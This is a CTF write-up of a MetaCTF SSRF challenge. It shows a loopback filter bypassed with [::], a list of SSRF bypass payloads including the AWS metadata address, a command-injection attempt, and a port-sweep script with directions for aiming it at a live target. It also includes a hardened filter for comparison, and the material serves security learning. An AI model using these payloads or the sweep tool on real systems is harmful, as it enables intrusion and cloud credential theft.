SSRF: Accessing Internal Resources & Bypassing the Filter (CTF)

Hello Everyone, Hope you are doing well.

I am Basavaraj. If you want to read my older blogs and writeups, click here.

Today I am going to show how a Server-Side Request Forgery (SSRF) vulnerability can be used to reach internal resources that are not exposed to the outside.

Before starting, here are the Google dorks I use most often while testing for SSRF; they are also a good place to learn from:

intext:"server side request forgery" site:hackerone.com

intext:"server side request forgery" site:medium.com

intext:"server side request forgery" site:github.com

(These return a lot of good SSRF writeups.)

There are many other useful resources, but you can find them online.

Let's start. This CTF was held by MetaCTF and the challenge is still live.

The challenge description

You can access the challenge here.

Homepage of the challenge

I entered my Burp Collaborator URL, clicked Browse, and the page displayed the content of that URL. At the same time the server made an HTTP request to my Collaborator host, which confirms the fetch happens server-side and not in my browser: the application is acting as a proxy for whatever URL I give it.

Response of the Burp Collaborator URL

HTTP interaction

SSRF can sometimes be escalated to RCE (for newcomers: for example when the server builds a shell command such as a curl call from the URL you supply). So I first tried injecting a command into the URL, but it didn't work:

i.e http://burp.url?`whoami`

I also tried the file:// protocol and several others, but everything was blocked:

Request blocked because only http & https are supported

So I had to stay with http or https. The challenge description clearly says the flag is hidden behind a web server, so I tried http://localhost and http://127.0.0.1 (and the https variants of both), but the response was "blocked" every time.

Here you can find a good checklist for bypassing SSRF filters. Working through it, I tried http://[::]:80/ and got this response:

The page came back with the same content as the front end, which means the web server serving the challenge is also reachable on localhost port 80 through the SSRF. It also tells us the filter only rejects the obvious loopback spellings (localhost, 127.0.0.1) and does not recognise the IPv6 unspecified address [::], which the server happily connects to.
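To make the filter weakness concrete, here is an added example (not code from the original post or from MetaCTF). It models the behaviour the writeup observed with a hypothetical naive_filter() (http/https only, "localhost" and "127.0.0.1" rejected by string match, "[::]" let through) next to a hardened filter that parses or resolves the host and rejects any address that is not globally routable. The BYPASS_CANDIDATES list is constructed here; all of them are spellings that reach the local machine or the link-local cloud metadata range on a typical Linux host.

```python
"""Deny-list SSRF filter versus a resolve-and-classify filter (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed list of loopback / metadata spellings that slip past a
# string-matching deny list.
BYPASS_CANDIDATES = [
    "http://[::]:80/",             # IPv6 unspecified address (the one used in the post)
    "http://[::1]:80/",            # IPv6 loopback
    "http://0.0.0.0:80/",          # IPv4 unspecified address
    "http://127.1:80/",            # shorthand dotted form accepted by inet_aton()
    "http://2130706433:80/",       # 127.0.0.1 as a single decimal integer
    "http://0x7f000001:80/",       # 127.0.0.1 in hex
    "http://169.254.169.254/latest/meta-data/",  # AWS instance metadata (link-local)
]


def naive_filter(url: str) -> bool:
    """Hypothetical deny-list filter: http(s) only, reject obvious loopback names."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()
    return host not in ("localhost", "127.0.0.1")


def parse_ip_literal(host: str):
    """Parse the host as an IP literal, including the shorthand forms that
    ipaddress.ip_address() rejects but curl and browsers still accept
    (127.1, decimal 2130706433, hex 0x7f000001). Returns None for DNS names."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    value = None
    try:
        if host.lower().startswith("0x"):
            value = int(host, 16)
        elif host.isdigit():
            value = int(host)
        else:
            parts = host.split(".")
            if 1 < len(parts) < 4 and all(p.isdigit() for p in parts):
                # inet_aton semantics: the last component fills the remaining bits
                nums = [int(p) for p in parts]
                value = 0
                for n in nums[:-1]:
                    value = (value << 8) | n
                value = (value << (32 - 8 * (len(nums) - 1))) | nums[-1]
    except ValueError:
        return None
    if value is None or not 0 <= value <= 0xFFFFFFFF:
        return None
    return ipaddress.IPv4Address(value)


def dns_resolve(host: str) -> list:
    """Resolve a name to every A/AAAA record it maps to."""
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def hardened_filter(url: str, resolve=dns_resolve) -> bool:
    """Allow http(s) only, and only when every address the host maps to is
    globally routable: loopback, unspecified, link-local (169.254.0.0/16,
    which covers the AWS metadata service), private, multicast and reserved
    ranges are rejected whatever spelling the attacker used."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    literal = parse_ip_literal(parts.hostname)
    if literal is not None:
        addrs = [literal]
    else:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except (OSError, ValueError):
            return False          # unresolvable or odd address: fail closed
    return bool(addrs) and all(a.is_global for a in addrs)


def compare(urls, resolve=dns_resolve) -> dict:
    """Map each URL to (naive_allows, hardened_allows) for a side-by-side view."""
    return {u: (naive_filter(u), hardened_filter(u, resolve)) for u in urls}
```

Run compare(BYPASS_CANDIDATES) and every entry comes out as (True, False): the deny list passes all seven, the resolve-and-classify check passes none. Two caveats for a real fix: the hardened check resolves the name once, so the fetch must connect to the address that was validated (or DNS rebinding can swap it between check and request), and every redirect the fetch follows must be re-checked the same way.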

With the filter bypassed, the next step is to find the other web server running internally, where the flag should be. Changing the port from 80 to 79 returned nothing at all (the port appears to be closed), so I captured the request, sent it to Intruder and brute-forced the port number from 1 to 10000. Exactly one other port answered: 7349.

Intruder

The open port 7349

Requesting that port through the SSRF returned the flag:

Final Flag
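The Intruder run above is just a loop over port numbers with a rule for telling "closed" apart from "blocked" and "open". Here it is as a script, added as an example and not code from the original post. The challenge's browse endpoint, its parameter name and its exact responses are not documented in the writeup, so make_http_probe() takes them as assumptions to be filled in from the request captured in Burp, and the block runs its sweep against a constructed in-memory stand-in (fake_probe) that behaves the way the writeup describes: obvious loopback names are refused, closed ports return an empty body, and two ports (80 and 7349) serve content.

```python
"""Internal port sweep through an SSRF (added example, offline demo)."""
import urllib.parse
import urllib.request

BLOCKED_MARKER = "blocked"   # assumed substring of the app's filter-rejection page


def make_http_probe(browse_url: str, param: str = "url", timeout: float = 5.0):
    """Build a probe that submits a target URL to the vulnerable browse endpoint
    and returns the body the server fetched on our behalf. browse_url and the
    parameter name are assumptions; take them from the request seen in Burp."""
    def probe(target: str) -> str:
        data = urllib.parse.urlencode({param: target}).encode()
        req = urllib.request.Request(browse_url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    return probe


def classify(body: str) -> str:
    """Closed ports came back empty in the writeup; the filter answers with a
    fixed message; anything else is content from a live internal service."""
    if not body.strip():
        return "closed"
    if BLOCKED_MARKER in body.lower():
        return "blocked"
    return "open"


def sweep(probe, ports, host="[::]") -> dict:
    """Request http://<host>:<port>/ through the SSRF for every port and return
    {port: (state, first 80 chars of body)}. The default host is the [::]
    spelling that got past the challenge's filter."""
    results = {}
    for port in ports:
        try:
            body = probe(f"http://{host}:{port}/")
        except Exception as exc:        # the app itself failed; record and move on
            results[port] = ("error", str(exc)[:80])
            continue
        results[port] = (classify(body), body[:80])
    return results


def open_ports(results: dict) -> list:
    """Ports whose probe returned real content, sorted."""
    return sorted(p for p, (state, _) in results.items() if state == "open")


# ---- constructed stand-in for the challenge server (offline demo) -------------
FAKE_INTERNAL_SERVICES = {
    80:   "<html><title>Browse a URL</title></html>",   # the front end again
    7349: "FLAG_PLACEHOLDER",                            # the hidden web server
}


def fake_probe(target: str) -> str:
    """Mimics the vulnerable app as described in the writeup: refuses the obvious
    loopback spellings, returns a banner for open internal ports, and an empty
    body for closed ones."""
    parts = urllib.parse.urlsplit(target)
    if parts.hostname in ("localhost", "127.0.0.1"):
        return "Request blocked"
    return FAKE_INTERNAL_SERVICES.get(parts.port or 80, "")


if __name__ == "__main__":
    found = sweep(fake_probe, range(1, 10001))
    print("open ports:", open_ports(found))
    for port in open_ports(found):
        print(port, found[port][1])
```

Against a live target, swap fake_probe for make_http_probe(<browse endpoint>, <parameter>), keep the range at 1 to 10000 as in the writeup, and expect 80 (the front end) plus whatever internal service is present. Ten thousand server-side fetches is noisy and slow; a thread pool and a small delay per request are worth adding, and a port that times out rather than refusing the connection will show up as "error" rather than "closed", which is itself useful information about a host firewall.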

This challenge is also hosted on AWS EC2, so the same SSRF can reach the EC2 instance metadata service and pull out AWS keys. I don't know whether this was intended; it may be an oversight by the CTF developers, since nothing filters that endpoint.

Thank you all.

Instagram: https://www.instagram.com/basu_banakar

Twitter: https://twitter.com/basu_banakar

Website: https://basubanakar.com/
